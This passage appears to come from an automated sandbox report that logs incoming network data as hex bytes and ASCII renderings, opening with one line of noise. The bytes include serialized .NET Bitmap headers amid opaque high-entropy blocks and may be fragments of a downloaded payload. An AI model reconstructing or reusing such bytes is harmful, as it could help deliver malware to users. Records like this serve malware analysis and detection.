mi\2,M#YGt_Y+]o-tLcYu115KaJ5H}M)9OtSB,:sY5uD\|6Z.4-Tg+xe7W3<d$6#@q}.W,k//)ew`Y#yHS0REQYJJS`=-ShP\|N"P;V?
2021-10-16 14:53:39 UTC	4605	IN	Data Raw: 10 1a 3d 8f 60 7f f2 e4 d6 1c 62 01 a5 c3 c1 f6 49 b5 a3 15 f1 4f 4f e1 65 6a e4 61 98 4a 9e a0 79 73 ed 30 6a 97 0a 16 08 90 0a bb d6 23 3a e1 40 3f 51 70 39 69 d1 59 6e 1a 4e e8 ff 7f bb b3 b8 86 92 c6 e1 1e 97 18 41 aa f3 6e e2 0e 2e d2 e0 7e bf e6 14 b5 09 f8 56 1b b4 0d 22 05 90 dd 0a 47 2f 8a 51 5a 72 3a be 89 32 ca 6f e2 3e 4e c8 61 9e 8c 8c a0 f7 26 52 5a f9 a4 59 75 08 75 2a 6a 19 84 6c 60 f2 cc 0e 82 1f 4c d0 1c 56 98 a5 01 40 ec c2 58 6e 6c 9c 21 e8 52 f8 61 10 55 2a f8 75 f0 f0 1f ec 86 c4 69 63 54 87 0f 9a b3 d6 3e 82 6b 85 0c dd 33 b4 dc 93 ef a6 40 08 2f e3 c5 95 d6 dd 62 f1 4c f9 df ae 53 ba 5a 7b 4f 79 5b 7f 2c 2e 0d 49 d6 52 0f 8f 08 b4 af 30 53 5b c8 86 b5 c8 a2 19 43 2d 58 9e 25 3d 8c f5 fd c1 2f 97 1d 70 a5 97 62 0a 01 e1 5e 20 82 6d Data Ascii: =`bIOOejaJys0j#:@?Qp9iYnNAn.~V"G/QZr:2o>Na&RZYuujl`LV@Xnl!RaUuicT>k3@/bLSZ{Oy[,.IR0S[C-X%=/pb^ m
2021-10-16 14:53:39 UTC	4621	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4637	IN	Data Raw: 0f e6 58 51 f4 87 00 e5 e0 cb 86 6e 0d 90 75 cc d6 df 8d 5a c9 3f f4 20 d8 dc 10 4c 3e 6e 41 50 df 4f 89 47 cc 9d 7c 55 dc 61 03 e1 cd d8 ac dc 1a dd 90 a8 14 50 e1 bb ff 51 b0 10 20 72 f2 43 35 84 5e 0d 0f 00 00 00 00 f5 bc 28 7e 48 bf 78 63 9a d3 c5 cf b8 6f 2f 8b b7 6d 02 7f ba 06 71 af 31 94 08 60 64 ee 7a da 0c b4 b7 ec e2 15 36 cb 64 62 06 81 c7 14 6f 2f 6f df b7 6d ce 6b 4c b9 97 0e 44 77 f7 b8 e9 02 be 8b 4a b0 92 da 84 9b 34 75 14 9d 79 06 03 e7 c8 86 65 f5 1b 8d c2 87 f2 32 05 21 10 88 5e b9 65 a6 51 d1 5b 3c c6 32 1b 0f e5 9f 7e d5 28 fb 5a 62 49 4d e1 fb 49 c9 0b 56 88 ce 7a d7 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 Data Ascii: XQnuZ? L>nAPOG\|UaPQ rC5^(~Hxco/mq1`dz6dbo/omkLDwJ4uye2!^eQ[<2~(ZbIMIVz@QSystem.Drawing, Version=4.0.0.0
2021-10-16 14:53:39 UTC	4653	IN	Data Raw: db 87 07 c7 5f 61 52 61 28 44 6c d5 28 c1 2e a8 88 67 e7 c1 3c 80 75 ff 4a 7b 59 05 a1 45 39 e9 c7 7c 5f 2f b5 95 31 f3 e5 85 66 e6 18 05 85 d2 67 d5 23 ea d8 a6 55 cc 1f dd 6d 87 69 95 3d 99 ac 27 5a 44 75 b4 65 90 1b 21 ea 94 c2 d1 10 7a dd 99 c9 65 cc 66 ba e0 f1 9e 5f 51 03 be c2 b1 19 45 d8 51 40 62 04 48 d3 0c 32 b2 ad ad 5b cf 81 55 19 2b 9c 35 01 cd 39 36 e3 65 ba ec fd 65 00 79 16 ae 17 91 aa 67 b0 99 48 13 dd 1a 79 7c 3d 8c 2a ed 18 56 f1 70 38 f6 6f ba 6a 6e 44 6c 5e 0b 12 1b 51 9f 61 80 0a 25 b8 ad 91 22 98 f8 f5 d9 d7 ee b7 c1 fe d5 85 36 3a 19 b8 70 77 1a 22 15 84 00 7d e3 78 0a 54 e0 1c 22 3a 20 8f 45 16 32 7e e0 dd e2 10 80 1a a9 fc a3 f8 d0 6d c1 1f 48 eb e1 58 8c cc 21 86 6d 9c 4b ae 38 6d 5e e1 98 9b 94 7b 8e f9 0f cb 47 44 2f 70 c5 34 Data Ascii: _aRa(Dl(.g<uJ{YE9\|_/1fg#Umi='ZDue!zef_QEQ@bH2[U+596eeygHy\|=*Vp8ojnDl^Qa%"6:pw"}xT": E2~mHX!mK8m^{GD/p4
2021-10-16 14:53:39 UTC	4669	IN	Data Raw: 5d c8 4a b7 2b e8 8b 77 a5 55 84 ec 17 a6 7f 2a 83 c8 dd 7c c5 5a 13 58 90 4d a4 63 b6 34 a5 c1 39 a2 5f df 0a 3b 57 a8 bc 3d 35 ac a3 53 ab 75 67 6d 2e 87 44 ce fb b8 a0 ed ac df cd 41 85 e5 4f de 3b 06 95 28 23 fb 64 d3 a0 de 99 b3 1e 74 af 0f 9e db ba af df 43 03 70 e1 46 00 34 9f 52 93 d2 29 f4 08 36 02 9b b7 f9 e3 8c 07 92 24 df fb 79 bf 0c eb f2 d7 e3 01 af bd 2e 52 e5 f5 ad 9a ae f0 8c c6 bb a6 3b 5a 37 88 d0 51 22 fb c5 4e 2b 6f 35 74 59 a1 90 98 7a b0 34 a1 55 d0 2f 00 bb 1b 50 bb b9 4c 4a a9 84 e8 8d f7 7d 44 7b 38 37 e0 23 69 e6 ea d4 b2 0b 12 7c 32 bd 07 ad 07 10 7e 2c f0 ed 7c 36 6a 4b 7b 38 17 d4 1f 85 b7 9c dd 1c 45 fc b2 4e 8f 88 a4 38 54 e6 7c dc 9b 1b d4 9f 76 6e 50 ec 87 f7 23 7d b4 05 ef bb 8d a8 15 4c 1a ae e6 b8 c0 4c fb 35 e3 7c 56 Data Ascii: ]J+wU*\|ZXMc49_;W=5Sugm.DAO;(#dtCpF4R)6$y.R;Z7Q"N+o5tYz4U/PLJ}D{87#i\|2~,\|6jK{8EN8T\|vnP#}LL5\|V
2021-10-16 14:53:39 UTC	4685	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4689	IN	Data Raw: 9d ac 86 98 5e 9d 62 42 48 5b 10 cc 28 35 dd 6e 20 f4 8a e2 bb 1b d0 9a 02 c4 38 1f 02 42 1c db 1e 2f 38 9e 2a c2 52 26 8f 64 d9 f4 eb 97 d9 4c 80 a2 88 e3 0f 8b cf 5d 9d df e0 5e 0c da bf 64 9c 69 d1 a2 48 f0 00 a1 28 c2 c0 cf df 29 cb 97 80 11 18 34 07 2b 07 3a 42 02 53 bd 45 be 05 2b b2 74 d7 ce 32 38 ab e2 5b bd b8 81 58 13 ac 1b dd 7c ef d0 fc 1e 89 86 c3 d3 21 64 1b 29 2e 62 3d 61 71 4a f3 80 9e b5 e1 8f 78 f9 04 fe c6 03 a0 7d 0f c4 92 5e 0a de a7 41 43 18 2a 62 4a 1b cb 72 f0 4e 22 25 9f f3 4b 02 c2 5a 18 8a eb f0 2b a5 04 99 54 63 b8 9d 0a 93 d5 3f 65 c1 09 bc 87 6e 1b 12 80 fa eb 7e b8 9a c7 d8 1f 16 f5 0c c1 70 21 9e cd 9e e3 a4 37 7a 8e 42 40 8e 76 4e b1 9d 6f 5c 48 63 9d 73 d7 43 87 16 68 a8 6f a5 52 81 22 70 0f 0c b7 48 82 f5 e6 1e c6 b0 34 Data Ascii: ^bBH[(5n 8B/8R&dL]^diH()4+:BSE+t28[X\|!d).b=aqJx}^ACbJrN"%KZ+Tc?en~p!7zB@vNo\HcsChoR"pH4
2021-10-16 14:53:39 UTC	4705	IN	Data Raw: a5 63 d7 d1 25 4f bf 58 ec 76 36 41 65 a9 9e 54 7c b1 cf da f3 5e 2c c3 8f ee 44 74 43 8a 77 25 42 80 58 67 b5 a1 a6 ee 02 1f e6 30 af 0b 39 59 59 19 c1 44 1f d9 37 68 3e cd 40 2d 16 f8 cd 81 c7 92 56 65 04 d6 94 ae 99 1a e5 02 6f 89 96 8c 9b 08 15 48 0c d3 97 9b 36 27 48 01 29 b2 15 25 9a 13 c0 7a 1f 7b b0 3b 46 1b 34 f9 bb 2f d1 7d a0 00 2a 1e ea 5e 46 80 fc 23 ff fd 08 8a b4 84 68 a0 ae 19 dd 85 16 a3 48 4f 0e 39 97 17 07 6d 71 07 1e c1 f0 f0 0a 62 d0 c8 4a 0f bc b8 98 15 3f e3 b5 00 d6 e6 49 c9 5f 18 bf 25 b9 9c 43 81 89 e9 cc 10 f5 bf 08 03 57 38 05 ac 54 57 89 11 dd 7b 14 0a 7f d2 63 a0 5e 87 cd 5f 8c 41 b6 29 3b 4a 6e 46 65 43 c2 2a 21 cb 82 a2 46 68 b3 a7 c4 50 e7 2c f4 6a 0d e6 c7 ec 9d 29 42 c1 94 2f ce 9f 4a c9 3b d5 ed 59 f4 2f 91 d8 46 00 91 Data Ascii: c%OXv6AeT\|^,DtCw%BXg09YYD7h>@-VeoH6'H)%z{;F4/}^F#hHO9mqbJ?I_%CW8TW{c^_A);JnFeC!FhP,j)B/J;Y/F
2021-10-16 14:53:39 UTC	4721	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4737	IN	Data Raw: 79 cf a3 7d b2 f2 60 38 c4 1d c1 1b 98 0e 18 11 da 0b ea 21 62 df 22 63 d0 1f d5 27 5d 16 d4 04 85 fe 29 95 7e 29 c3 6c 77 ab 2c 93 0f a1 4c 02 b4 36 b4 a9 60 cc f1 7a ab a6 af c3 e5 02 4a ba c8 59 da 7f 1f fb 4e 13 c7 3f 1f 22 e7 38 35 50 36 1c 6f fa 25 26 d6 c2 5a fc 05 74 0d 0f 00 00 00 00 90 cd 47 64 31 db c2 a8 9e 06 75 36 06 f1 0c a8 e8 e9 15 85 b3 6a c2 03 f2 a8 7b c9 66 1a 1e 9c 74 33 29 c3 ef 23 43 fc ca 3e 14 3e 12 53 c1 94 36 9b 7e 45 59 0b a0 8c 76 1e 67 4d 0b 04 5d 5c 05 30 b9 f7 62 a8 15 5c 1b 04 a4 3e 11 c3 e1 d8 da bd 3e 82 d5 09 44 a9 9c 83 38 f4 36 94 53 9b 0d 6f 72 88 bd 28 63 c3 df 9e ba c2 8f 3f ed 6d e0 13 e9 54 3b ed 9b 50 3c ac 49 78 4d 1d 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d Data Ascii: y}`8!b"c'])~)lw,L6`zJYN?"85P6o%&ZtGd1u6j{ft3)#C>>S6~EYvgM]\0b\>>D86Sor(c?mT;P<IxM@QSystem
2021-10-16 14:53:39 UTC	4753	IN	Data Raw: 2f aa a9 83 e8 7a a5 b7 28 a8 69 a8 24 5e 1f 12 b0 e4 1c 1a b9 89 76 e9 ec 81 d7 02 6d bb 30 29 be b3 7e 7e ad 64 00 66 f4 ed 8a 98 29 37 ab f0 fd cd 82 58 17 fd ae ae 9c 7c 11 c7 3c 29 fb b4 0b ed aa 8f f8 cd dc 07 b1 90 dc da ef 69 8e 6a b9 ce 60 02 be 1e 84 8e b5 8b 75 2b d4 12 17 a8 ba be 25 24 06 6d a4 ed a2 fc 0e 2d 19 7f 7b 0e 2c d9 7a fe a2 c6 dc c2 b8 67 7a 4b 23 c8 ab 29 80 8e b9 79 d4 78 d5 b3 46 94 e3 7d c1 fe f2 3b 4d 73 7e e4 f9 79 c4 3d cb 6b 12 a0 3e 45 b5 35 c9 4c a3 10 1f 1d 9a 96 e4 ac 75 1f 14 72 1a 27 ce 6d cf 49 17 83 a3 9b c1 47 f6 92 f6 d8 cd 5e 72 f0 fd 54 1f e5 c2 a5 fa 3c 68 e6 be 66 22 21 a7 ff 61 ab d5 5b da bf 65 bb 66 f7 92 bf 8d ec 0b 08 42 be e3 8b ab 47 51 74 ca b5 17 96 8b 90 ff e5 0e 43 77 16 bc 4f 2c 0d fa 6e c2 79 1c Data Ascii: /z(i$^vm0)~~df)7X\|<)ij`u+%$m-{,zgzK#)yxF};Ms~y=k>E5Lur'mIG^rT<hf"!a[efBGQtCwO,ny
2021-10-16 14:53:39 UTC	4769	IN	Data Raw: 78 d9 c5 dd 6e 05 ed c8 86 d0 f5 dc c3 60 1c 1f 20 8e ea 7d 2e 12 be 7c 71 e4 1b 30 b3 55 51 b0 8d 74 9c 2e fe 50 80 af 6b 5e 82 1b 0c 81 f7 0d ec 13 e3 bf e9 dc ac f8 4e ed 22 90 05 ba 0f ac fd ba a5 f4 23 94 3a b9 d1 e9 09 15 19 f7 3e 87 a0 9b bf 7c b9 b9 cb 65 93 5f a6 2f 97 bf 0d a5 2a ab bc 80 80 ed 69 2c a7 ea bd eb 1f 86 b8 db ce 35 c0 d2 1c fd a0 3c 90 5e 56 98 25 03 df 7c c3 e0 cf c7 12 12 63 d7 77 ac 46 cc 3f 77 e9 1a df 89 94 40 36 c3 fd 68 67 84 da 87 50 57 1d 3f ec d9 5d b1 ef f9 03 2f de bc 79 d1 3c d4 fb 49 0d 62 49 c3 21 97 ef fe 53 3d 53 1c 6c a8 fa 16 eb 30 24 e8 cc b7 6a c4 c6 2c ad be fa 25 4f 9b 41 6a 19 a3 72 e7 20 b3 ae e0 e4 ab 7e eb 05 28 7c c2 f3 96 6a c9 42 b6 d2 bd c5 6e 93 c5 36 09 ab 04 05 48 1d eb 3f 83 f1 b0 7d d5 d8 72 f0 Data Ascii: xn` }.\|q0UQt.Pk^N"#:>\|e_/*i,5<^V%\|cwF?w@6hgPW?]/y<IbI!S=Sl0$j,%OAjr ~(\|jBn6H?}r
2021-10-16 14:53:39 UTC	4785	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4801	IN	Data Raw: 72 22 a6 33 4d 54 b5 78 eb cc c7 85 ce 1d a3 18 c3 29 b9 00 67 67 e2 d9 cd 26 a1 34 5d f2 04 9e ac 0f ed 87 34 bc 94 0f 70 a0 2b fa c7 ce 76 2c 60 b2 04 11 ff 5a b8 b7 34 5f 69 88 d3 d1 58 dc 8b 20 d3 34 85 c6 c2 8a b9 76 f7 fc 4f 6c 66 0e e3 1f 2f dc 6f 09 2d 48 ca f3 4c a5 eb 34 85 a0 53 45 80 c3 1f 03 e2 6c a1 5f 74 d8 94 ce 72 cd 2e ac 8c dc 17 39 a1 88 ef 51 a7 a0 f8 f8 35 12 10 db 64 80 ea a5 85 e8 f2 20 20 5a d8 2e 99 6a 6f 89 2e bf d7 ea 00 7a 96 f2 9e e3 ce b7 25 27 77 c5 0b 8b 6c 96 c1 30 3a 34 79 70 98 00 ee a2 37 8c 59 b6 27 58 b5 cc 33 96 cf 47 19 af 5e 8d 45 b3 da 2d af c7 52 b4 3b f9 07 df 0a eb b4 5e 36 73 7e f4 e4 3f 56 aa 11 50 4a 1c 47 76 8c 57 58 6e e4 8b 5e be af d1 97 2f 28 51 fe 91 c0 65 08 a1 25 01 43 aa 28 ed 1d 56 63 cb 28 c3 8b Data Ascii: r"3MTx)gg&4]4p+v,`Z4_iX 4vOlf/o-HL4SEl_tr.9Q5d Z.jo.z%'wl0:4yp7Y'X3G^E-R;^6s~?VPJGvWXn^/(Qe%C(Vc(
2021-10-16 14:53:39 UTC	4817	IN	Data Raw: 7a d6 64 b4 f9 8d 84 03 9a de 5c 7e d7 b8 bb e4 70 da 8a d7 86 e8 b5 9f 3e e6 99 02 93 6b 32 3d 4d e5 56 e0 a6 13 e1 40 48 f4 23 75 76 b2 e5 e4 38 68 fe 33 e1 b9 87 6b 5c e2 1a 84 50 e5 99 da c9 35 4b d7 78 1e cb 41 82 1c 54 60 0e ae b7 79 70 54 91 ae 4a f9 45 61 07 16 1f ac b1 ab 89 19 7d 69 c0 b9 39 b5 b6 fb 7f f3 3f 19 06 bd e7 81 e9 fb 30 dc c3 63 ce 70 53 c5 22 ec 55 7f c2 53 78 63 a8 c7 6b d3 17 57 92 95 b9 5e 41 65 4f f6 3b f4 29 04 b9 28 b9 d4 70 64 fb 57 d6 5e 99 93 d7 b5 f1 8f f3 ac 63 b7 94 05 6d c0 a9 14 44 e7 12 7f 5b 9c 68 5f 31 1c be f7 bb 32 da ee f9 85 12 a1 57 87 01 64 8c c2 25 90 7e 3d cb a8 36 5b b1 28 83 28 3b 78 72 82 b2 65 a4 f4 29 6c d8 23 f7 70 22 9f 7a 46 b1 e6 b7 39 d5 fb d3 1e 98 eb ea 47 2b a8 e0 e0 03 8f e2 2a 04 b4 29 2c cc Data Ascii: zd\~p>k2=MV@H#uv8h3k\P5KxAT`ypTJEa}i9?0cpS"USxckW^AeO;)(pdW^cmD[h_12Wd%~=6[((;xre)l#p"zF9G+*),
2021-10-16 14:53:39 UTC	4833	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4849	IN	Data Raw: 23 84 5d 7f 6b 73 47 ac b5 b8 bc 0b 40 00 01 00 00 00 ff ff ff ff 01 00 00 00 00 00 00 00 0c 02 00 00 00 51 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2c 20 56 65 72 73 69 6f 6e 3d 34 2e 30 2e 30 2e 30 2c 20 43 75 6c 74 75 72 65 3d 6e 65 75 74 72 61 6c 2c 20 50 75 62 6c 69 63 4b 65 79 54 6f 6b 65 6e 3d 62 30 33 66 35 66 37 66 31 31 64 35 30 61 33 61 05 01 00 00 00 15 53 79 73 74 65 6d 2e 44 72 61 77 69 6e 67 2e 42 69 74 6d 61 70 01 00 00 00 04 44 61 74 61 07 02 02 00 00 00 09 03 00 00 00 0f 03 00 00 00 e6 16 00 00 02 42 4d e6 16 00 00 00 00 00 00 36 00 00 00 28 00 00 00 2c 00 00 00 2c 00 00 00 01 00 18 00 00 00 00 00 00 00 00 00 c4 0e 00 00 c4 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: #]ksG@QSystem.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3aSystem.Drawing.BitmapDataBM6(,,
2021-10-16 14:53:39 UTC	4865	IN	Data Raw: 35 23 cf d4 8f ac 78 f5 d1 1f 58 1d 37 3c 9d ca af be 25 20 b5 35 33 2b c5 c0 b9 9b c3 e4 e6 73 3d 69 e5 73 2d 9e 01 9f 87 00 50 d4 cf 36 71 ed 77 20 07 54 90 93 a5 17 af e6 c7 5b 12 74 16 bd de fa d1 3c 02 b8 d9 ea 02 f9 3b 77 e6 09 5b 3d b5 4f 53 09 27 05 40 94 b9 20 0e 7c 0b 6a 59 01 92 0a b4 c9 d3 83 04 eb 06 af 44 31 38 90 54 39 a3 34 1b e4 49 1c ec f3 e7 5a 6b a0 92 0f 8c 27 a3 c9 c0 1f 2c 66 99 73 e6 2e c9 00 a8 be 3b c8 12 d3 bc 39 1e 8c 20 25 b2 df ce e6 4a 1a 89 b2 4b ce a1 5b 45 ee 85 4c cc 2b 1c 23 e7 b1 32 6b 94 2f 68 ec 9e f0 bc 35 05 0f 11 e3 f1 d5 dc 74 68 9e a4 92 7b 12 51 2b 04 6f f5 95 30 d2 a9 11 ab 35 69 df 0d 0a 23 df ed 08 59 9a 64 e0 2c f0 d2 36 61 35 67 71 b1 7a c8 b8 30 61 f8 2d ac b7 4c 20 4f 38 42 f1 41 42 be 7a 7a 80 ea 32 dd Data Ascii: 5#xX7<% 53+s=is-P6qw T[t<;w[=OS'@ \|jYD18T94IZk',fs.;9 %JK[EL+#2k/h5th{Q+o05i#Yd,6a5gqz0a-L O8BABzz2
2021-10-16 14:53:39 UTC	4881	IN	Data Raw: e8 ee 9e 55 46 4a e9 a3 03 c0 cc dd c1 8d 11 e6 32 ef 30 11 bd a5 ef ea 66 0d 91 09 38 28 3d 6d 32 f7 15 a4 22 65 53 7f 9e a7 f8 4d 45 e7 75 b6 72 4a 25 b0 c8 c9 13 06 62 93 e7 4e 47 11 a7 ed 9d 97 20 d9 6c 69 71 ad 0d a8 51 c1 74 9d f0 55 dc c0 28 71 39 61 ee 4b 32 09 2c bf ff 26 d1 c4 4e 36 91 35 a2 27 31 9f 3c f4 ea e7 d4 12 c1 a2 3a 86 71 b7 cf cf 64 63 c6 96 65 cc b7 9b 83 62 b2 24 af 48 b2 08 86 ca d6 8c 3f 2a 36 96 a8 82 33 6e 77 9b e7 a9 9c ad 33 80 5b 21 62 41 c3 2e d0 15 10 cb 1a 0a 85 61 4b e7 28 6b 5f c5 b0 60 b0 eb 53 a5 10 35 e0 11 b6 4b 04 d9 e5 e3 f5 19 9a 72 10 10 5b b7 67 f6 d9 20 d3 3e f6 d8 ef 8d 8d 0b 7a c2 42 91 7c ac af db d7 85 fb d3 af b1 9d b6 a7 96 96 61 79 a1 25 88 0c ec f2 78 36 27 10 54 0b 5b 0f f8 b4 c5 b2 e6 6d 8d be 49 f3 Data Ascii: UFJ20f8(=m2"eSMEurJ%bNG liqQtU(q9aK2,&N65'1<:qdceb$H?*63nw3[!bA.aK(k_`S5Kr[g >zB\|ay%x6'T[mI
2021-10-16 14:53:39 UTC	4897	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2021-10-16 14:53:39 UTC	4913	IN	Data Raw: 40 5e e7 84 10 66 4d 5b b4 21 47 b8 c5 4b b7 e9 95 38 9f 5c ea bf 0d c6 e1 f8 c9 25 13 2a 3e 5d 4e 79 0c 9e d2 7e 45 37 0f c3 a6 a1 fc f6 7c fa d2 36 aa fd 7d ee 82 be 4a 93 1b 93 eb 32 7f 5a 16 27 54 1a f7 42 8f a4 a8 5b c0 f0 cb 64 77 f0 c0 3d 29 d4 0f a9 60 33 e3 11 eb 16 aa 2e 78 c4 b4 18 9f e3 8e 2c c4 a0 d9 5f f8 d6 be 2d 71 8e 14 b9 03 5a 24 d8 a5 9b c9 89 14 52 7e 25 6c a7 cc 3f 2f 72 eb d5 b7 84 6c 6e e6 4f cf 64 0e 57 1b 18 b0 33 12 4d 4c 35 82 91 d2 08 d8 2b 9a 46 0e 05 ae e6 73 02 83 ff b6 57 ba 81 88 29 e0 49 c0 a3 8d d3 6b 47 dc f9 15 98 b7 f3 76 e7 f2 25 6d 16 6c ae 5e 92 60 37 4f 2e 19 b2 ec 1d 5d 35 2a cb ea 61 3b d0 83 cd d8 16 ac 9c f9 ce ac be 0f 63 d9 d2 c9 55 67 a1 60 f9 18 96 47 0a c3 19 dc 66 c0 fa 70 c0 c1 33 35 47 83 b8 90 22 b4 Data Ascii: @^fM[!GK8\%>]Ny~E7\|6}J2Z'TB[dw=)`3.x,_-qZ$R~%l?/rlnOdW3ML5+FsW)IkGv%ml^`7O.]5a;cUg`Gfp35G"
